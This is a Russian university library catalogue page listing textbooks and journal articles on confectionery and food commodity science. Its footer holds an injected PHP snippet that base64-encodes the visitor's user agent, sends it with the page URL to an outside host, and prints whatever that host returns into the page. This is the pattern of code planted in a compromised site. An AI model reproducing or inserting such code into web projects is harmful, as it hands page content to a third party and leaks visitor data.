Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

293 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ИЗДЕЛИЯ КОНДИТЕРСКИЕ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 12
1. 
Товароведение, экспертиза в таможенном деле [Текст] / А. В. Виноградова [и др.] ; ред. Е. Л. Богданова, 2013. - 389 с.
Ключевые слова 
ТЕОРИЯ ТОВАРОВЕДЕНИЯ -- КЛАССИФИКАЦИЯ ТОВАРА -- КОДИРОВАНИЕ ТОВАРА -- СТАНДАРТИЗАЦИЯ ТОВАРА -- ПОДТВЕРЖДЕНИЕ СООТВЕТСТВИЯ -- ИДЕНТИФИКАЦИЯ ТОВАРА -- ФАЛЬСИФИКАЦИЯ ТОВАРА -- ЭКСПЕРТИЗА ТОВАРОВ -- ЭКСПЕРТИЗА ТАМОЖЕННАЯ -- ДЕЛО ТАМОЖЕННОЕ -- ТОВАРОВЕДЕНИЕ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ЭКСПЕРТИЗА ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ЗЕРНО -- ПЛОДЫ -- ОВОЩИ -- САХАР -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ТОВАРЫ ВКУСОВЫЕ -- ЖИР ПИЩЕВОЙ -- МАСЛО -- МОЛОКО -- МЯСО -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- РЫБА -- МОРЕПРОДУКТЫ -- ТОВАРОВЕДЕНИЕ НЕПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ЭКСПЕРТИЗА НЕПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- НЕФТЬ -- НЕФТЕПРОДУКТЫ -- СМОЛЫ СИНТЕТИЧЕСКИЕ -- ПЛАСТМАССА -- ТОВАРЫ ПАРФЮМЕРНО-КОСМЕТИЧЕСКИЕ -- ТОВАРЫ СИЛИКАТНЫЕ -- ДРЕВИСИНА -- ЛЕСОМАТЕРИАЛЫ -- ТОВАРЫ МЕБЕЛЬНЫЕ -- МЕТАЛЛ -- ТОВАРЫ ЮВЕЛИРНЫЕ -- ТОВАРЫ ТЕКСТИЛЬНЫЕ -- ТОВАРЫ ТРИКОТАЖНЫЕ -- ТОВАРЫ ШВЕЙНЫЕ -- ТОВАРЫ КОЖЕВЕННЫЕ -- ТОВАРЫ ПУШНО-МЕХОВЫЕ -- ТОВАРЫ ОВЧИННО-ШУБНЫЕ

Учебное пособие затрагивает вопросы общей теории товароведения: классификации и кодирования, качества товаров, градаций качества; стандартизации и подтверждения соответствия, экспертизы товаров в таможенном деле. В пособии дан краткий обзор основных товарных групп с учетом присутствия на российском рынке значительного количества товаров зарубежного производства, а также требований, предъявляемых к товарам, пересекающим границы Таможенного союз а и находящихся в обращении на единой таможенной территории.

Учебное пособие предназначено для студентов, обучающихся по специальности 036401 «Таможенное дело».

2. 
Тутельян В. А. Химический состав и калорийность российских пищевых продуктов [Текст] / В. А. Тутельян, 2012. - 283 с.
3. 
Питание и общество. - Журнал, 2010г. № 4
Оглавление 
  • Медведева, О. С заботой о детях / О. Медведева. - с.7
    Кл. слова: ПИТАНИЕ ШКОЛЬНИКОВ
  • Кожин, А. . Энергетические напитки: вредно или очень вредно? / А. . Кожин. - с.9
    Кл. слова: НАПИТОК ЭНЕРГЕТИЧЕСКИЙ
  • Шаулина, Л. Ресторанный рынок России: не плывем, но и не тонем / Л. Шаулина. - с.9
    Кл. слова: РЫНОК РЕСТОРАННЫХ УСЛУГ
  • Лазутина, В. I Чемпионат исламской кухни / В. Лазутина. - с.10-12
    Кл. слова: КУХНЯ исламская, ЧЕМПИОНАТ КУЛИНАРНОГО МАСТЕРСТВА
  • Лазутина, В. "Будем ждать новой встречи!" / В. Лазутина. - с.13-14
    Кл. слова: КОНКУРС ПРОФ МАСТЕРСТВА
  • Пасха. - с.17
    Кл. слова: КУХНЯ ГРЕЧЕСКАЯ
  • Из ягнятины. - с.18-19
    Кл. слова: БЛЮДА ИЗ ЯГНЯТИНЫ, МЯСО ягненка
  • Оформление мучных кондитерских изделий. - с.20-21
    Кл. слова: ИЗДЕЛИЯ КОНДИТЕРСКИЕ, КАРАМЕЛЬ
  • Коцци, Л. Спагетти / Л. Коцци, О. Шмелева. - с.22
    Кл. слова: КУХНЯ ИТАЛЬЯНСКАЯ, Спагетти
  • Филонов, М. Плод долголетия - абрикос / М. Филонов. - с.23
    Кл. слова: Абрикос
  • "ПРОДЭКСПО - 2010". - с.24-25
    Кл. слова: ВЫСТАВКА продуктов питания, ПРОДУКТЫ ПИТАНИЯ
  • Троицкая, Е. Стейки - что мы о них знаем? / Е. Троицкая. - с.28-29
    Кл. слова: Стейки
4. 
Новости торговли. - Журнал, 2007г. № 9
Оглавление 
  • Новый шоколад СладКо - стабильность высокого качества и постоянство вкуса. - с.9
    Кл. слова: ШОКОЛАД
  • Кузнецова, Н. Сладкие радости / Н. Кузнецова. - с.40-47
    Кл. слова: ИЗДЕЛИЯ МУЧНЫЕ, ИЗДЕЛИЯ КОНДИТЕРСКИЕ
  • Миронова, В. Чаепитие в высокой динамике / В. Миронова. - с.48-54
    Кл. слова: ЧАЙ - ТОРГОВЛЯ
5. 
Пищевая промышленность. - Журнал, 2010г. № 1
Оглавление 
  • Скрынник, Е. Б. Основные направления развития пищевой и перерабатывающей промышленности на среднесрочную перспективу / Е. Б. Скрынник. - с.4-9
    Кл. слова: ПРОМЫШЛЕННОСТЬ ПИЩЕВАЯ, РЫНОК ПРОДОВОЛЬСТВЕННЫЙ
  • Казакова, Е. В. Защитное съедобное покрытие на основе белков / Е. В. Казакова, Л. С. Кузнецова. - с.16-18
    Кл. слова: УПАКОВКА СЪЕДОБНАЯ, ПОКРЫТИЕ СЪЕДОБНОЕ
  • Калошин, Ю. А. Новая классификация фасовочных устройств / Ю. А. Калошин, С. М. Шамшурко. - с.20-21
    Кл. слова: УСТРОЙСТВО фасовочное, ФАСОВКА, ДОЗАТОР жидкости
  • Федотова, О. Б. "Активная упаковка" из полимерных материалов / О. Б. Федотова, Д. М. Мяленко, А. В. Шалаева. - с.22-23
    Кл. слова: ПОЛИМЕР, УПАКОВКА, ПЛЕНКА полиэтиленовая
  • Вельтищев, В. Н. Установка для промывания колпачков / В. Н. Вельтищев, Ю. А. Калошин, С. Г. Токарева. - с.24
  • Гадлгареева, Р. Р. Транспортная логистика как элемент системы качества на предприятиях общественного питания / Р. Р. Гадлгареева, В. В. Касаткин, А. Г. Ларионова. - с.26
    Кл. слова: ЛОГИСТИКА ТРАНСПОРТНАЯ, ПЕРЕВОЗКА ТОВАРА, ПИТАНИЕ ОБЩЕСТВЕННОЕ - ЛОГИСТИКА
  • Пивоваров, В. И. Основные направления обеспечения продовольственной безопасности населения / В. И. Пивоваров. - с.35
    Кл. слова: БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕННАЯ
  • Кретов, И. Т. Влияние концентрирования на аминокислотный состав творожной сыворотки / И. Т. Кретов, В. Ю. Овсянников, С. Л. Панченко. - с.44-45
    Кл. слова: СЫВОРОТКА, КОНЦЕНТРИРОВАНИЕ, АМИНОКИСЛОТА
  • Резго, Г. Я. Сохраняемость пищевых продуктов / Г. Я. Резго. - с.46-48
    Кл. слова: УБЫЛЬ ЕСТЕСТВЕННАЯ, ХРАНЕНИЕ ПИЩЕВЫХ ПРОДУКТОВ, ПОТЕРИ ТОВАРНЫЕ
  • Эм, В. Г. Использование плодоовощного сырья в производстве мармелада / В. Г. Эм, А. А. Сапарбекова, У. Ч. Чоманов. - с.50-51
    Кл. слова: МАРМЕЛАД, ИЗДЕЛИЯ КОНДИТЕРСКИЕ
  • Новый полуфабрикат для пищеконцентратной промышленности. - с.51-52
    Кл. слова: КОНЦЕНТРАТ, ПОЛУФАБРИКАТЫ ягодные, ПОЛУФАБРИКАТЫ фруктовые
  • Гладкова, И. А. Молочно-растительная основа для напитков функционального назначения / И. А. Гладкова, М. Е. Успенская, Л. В. Антипова. - с.54-56
    Кл. слова: ЭКСТРАКТ молочно-РАСТИТЕЛЬНЫЙ, АМАРАНТ, БОБЫ нута
  • Австриевских, А. Н. Новые формы концентратов сладких блюд / А. Н. Австриевских, В. В. Бебенин, В. М. Позняковский. - с.56-57
    Кл. слова: КИСЕЛЬ, КОНЦЕНТРАТ
6. 
Шепелев А. Ф. Товароведение и экспертиза кондитерских товаров [Текст] : Учеб. пособие для студ. высш. учеб. заведений / А. Ф. Шепелев, И. А. Печенежская, А. В. Шмелев. - 223 с.
7. 
Товароведение и экспертиза продовольственных товаров [Текст] : Учеб. пособие для студ. высш. учеб. заведений / А. Ф. Шепелев, И. А. Печенежская, О. И. Кожухова и др. - 677 с.
Держатели документа (Информация об экземплярах) 
8. 
Организация производства на предприятиях общественного питания [Текст] : Учеб. пособие для учеб. заведений сред. проф. образования и учеб. заведений начал. проф. образования / Под ред. Белоусовой С. Н., 2000. - 345 с.
9. 
Тимофеева, Валентина Афанасьевна. Товароведение продовольственных товаров [Текст] : Учеб. пособие для образоват. учреждений сред. и проф. образования по специальности 0612 "Товароведение" / В. А. Тимофеева, 2002. - 447 с.
Ключевые слова 
ПРОДОВОЛЬСТВЕННЫЕ ТОВАРЫ -- КОНДИТЕРСКИЕ ТОВАРЫ -- МОЛОЧНЫЕ ТОВАРЫ -- ПИЩЕВЫЕ ЖИРЫ -- МЯСНЫЕ ПРОДУКТЫ -- ЯИЧНЫЕ ТОВАРЫ -- РЫБНЫЕ ТОВАРЫ -- ВКУСОВЫЕ ТОВАРЫ -- ПЛОДООВОЩЫЕ ТОВАРЫ -- ЗЕРНО -- ПИЩЕВЫЕ КОНЦЕНТРАТЫ -- ПРИПРАВА -- ЧАЙ -- КОФЕ -- НАПИТОК чайный -- ПРЯНОСТИ -- ТАБАК -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- Крахмал -- Сахар -- Мед -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- МОЛОКО -- Мороженое -- СЫР -- ЖИР пищевой -- Масло растительное -- Маргарин -- Жир кулинарный -- МЯСО -- ЯЙЦЕПРОДУКТЫ -- Концентрат пищевой -- РЫБА

В книге рассматриваются основные вопросы товароведения продовольственных товаров в современных условиях; приведены необходимые <продавцу> и <товароведу> сведения по всем группам <товаров>, а также по вопросам <стандартизации> и <сертификации>, информационному обеспечению, которые позволят работникам торговли принимать квалифицированные решения в <коммерческой деятельности>.

10. 
Рыжакова, Алла Владимировна. Товароведение и экспертиза кондитерских товаров [Текст] : Учебник гриф-УМО / А. В. Рыжакова, 2005. - 224 с.

Изложены основные сведения о сырье и вспомогательных материалах, пищевых добавках, особенностях технологии производства сахаристых и мучных кондитерских изделий. Приведены информация о составе, свойствах и пищевой ценности; принципы товарной классификации и ассортиментной принадлежности; требования к качеству, маркировке, транспортированию, условиям хранения изделий. Рассмотрены процессы, протекающие при производстве и хранении, их влияние на качество изделий.

Для студентов высших учебных заведений, обучающихся по специальности "Товароведение и экспертиза товаров".

11. 
Справочник по товароведению продовольственных товаров [Текст] : Справочники/словари / Под ред. Т.Г.Родиной, 2003. - 608 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ -- Товары продовольственные -- ЦЕННОСТЬ ПИЩИ ЭНЕРГЕТИЧЕСКАЯ -- ЦЕННОСТЬ ПИЩИ биологическая -- ЦЕННОСТЬ ПИЩИ физиологическая -- ЦЕННОСТЬ ПИЩИ органолептическая -- Усвояемость пищи -- КОДИРОВАНИЕ ТОВАРА -- МАРКИРОВКА ТОВАРА -- ИНФОРМАЦИЯ О ТОВАРЕ -- БЕЗОПАСНОСТЬ пищевых продуктов -- Безопасность эпидемиологическая -- ТАРА -- УПАКОВКА -- УТИЛИЗАЦИЯ тары -- ДОБАВКА ПИЩЕВАЯ -- Краситель пищевой -- Консервант -- Антиокислитель -- Ароматизатор -- Препарат коптильный -- ТОВАРЫ зерномучные -- Зерно -- Мука -- Крупа -- МАКАРОНЫ -- Хлеб -- СУХАРИ -- ПЛОДЫ -- ОВОЩИ -- ГРИБЫ -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- РЕЗИНКА ЖЕВАТЕЛЬНАЯ -- Карамель -- Шоколад -- КАКАО - порошок -- Конфеты -- Ирис -- Драже -- Халва -- Печенье -- ВАФЛИ -- ПИРОЖНЫЕ -- ТОРТЫ -- РУЛЕТ -- КЕКС -- Сладости восточные -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ПРОДУКТЫ детского питания -- ТОВАРЫ вкусовые -- ЖИР ПИЩЕВОЙ -- МОЛОКО -- Сметана -- Сыр -- ТОВАРЫ молочные -- ЯЙЦЕПРОДУКТЫ -- МЯСО -- КОНСЕРВЫ МЯСНЫЕ -- РЫБА -- КОНСЕРВЫ РЫБНЫЕ -- ПРЕСЕРВЫ РЫБНЫЕ
Держатели документа (Информация об экземплярах) 
12. 
Товароведение продовольственных товаров [Текст] : Конспект лекций / М. Бурова, 2000. - 142 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3215 - 29.03.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.99 с.18 запросов, 0.64c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;